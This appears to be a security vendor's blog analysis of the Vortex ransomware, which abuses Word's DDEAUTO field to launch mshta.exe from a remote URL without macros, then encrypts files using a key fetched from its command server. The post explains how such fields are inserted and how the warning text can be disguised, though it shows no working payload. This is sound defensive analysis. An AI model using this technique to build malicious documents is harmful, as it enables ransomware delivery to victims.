Malware Family: Vortex
SHA256 Hash Value
Macros in Microsoft Office have been used extensively by malware authors as a mechanism to download and execute a malicious payload on a system. Defensive measures introduced by Microsoft such as disabling macros by default have not stopped malware authors as they continue to devise social engineering techniques to convince users to enable macros thereby allowing malware to perform malicious actions. However, with email gateways and other security products incorporating VBA filtering policies for MS Office documents, malware authors are using new techniques to deliver and execute malicious payloads in Microsoft Office applications.
Dynamic Data Exchange (DDE)
One technique is the use of Dynamic Data Exchange (DDE) – a protocol that allows Windows applications to share data. In this blog post, we will take a closer look at a ransomware sample that uses DDE to execute an application directly from MS Word without any macros. This technique allows malware to easily bypass security systems or email gateways with macro filtering.
Microsoft defines DDE as a set of messages and guidelines that allows applications to share data. Microsoft documentation explains that applications can use the DDE protocol for one-time data transfers for applications to send updates to one another as new data becomes available.
Malware authors take advantage of this technique because it allows external applications to be specified as a DDE data source. Word will execute these applications to retrieve information. Adding an external data source can be done by inserting a Field, manually changing its Field Code to DDEAUTO and appending the application path as well as additional parameters (Figure 1)
Depending on the security settings in Word, one of two warnings will be displayed whenever DDE commands are executed in a Word document (Figures 2 and 3).
Please note that while the second warning message (Figure 3) may raise suspicion, it is easy for a malware author to change the real path to the executable in the message to make it seem innocuous.
Analysis of a Ransomware Sample Using DDE
The ransomware sample that we analyzed is embedded with the DDEAUTO command. The command is automatically executed by Word when the document is opened. It provides the full path of the executable as well as the arguments that need to be passed.
In this case, the sample executes mshta.exe with an external URL as shown in Figure 4.
The path of the mshta executable is specified in this way because it tricks Word into thinking that MSword.exe is the target application as shown in Figure 5.
Ransomware Sample Behavior
The first action performed by the ransomware is to establish a connection with the C&C server and share the victim’s IP address and other information. This is highlighted in the behavior section of the VMRay Analyzer analysis report (Figure 6)
The second request to the C&C server returns data that is saved in .bat file which is later executed by the malware (Figures 7 and 8).
The next action is to download the encryption key from the C&C server (Figure 9). This key will subsequently be used in an encryption routine that encrypts all the files on the user’s system. The sample reads each file on the system, creates a new one (ending with .aes), writes the encrypted version of the file and finally deletes the original file (Figure 10).
Finally, the ransomware sample creates a “How to recover your files” text file in every directory of the user’s system (Figure 11).
VMRay Analyzer Results
While AV vendors have been slow to detect this new technique (Figure 12), VMRay’s agentless hypervisor-based dynamic analysis engine scored the file 100/100 with a severity label of ‘Malicious’. Several malicious behavior patterns are detected (Figure 13) and the detailed behavior of the sample (including the network activity) is also recorded in the Behavior section of the report.
An important point to note is that Sensepost reported the vulnerability to Microsoft back in August 2017. Microsoft responded that no further action will be taken, and it will be considered for a next-version candidate bug.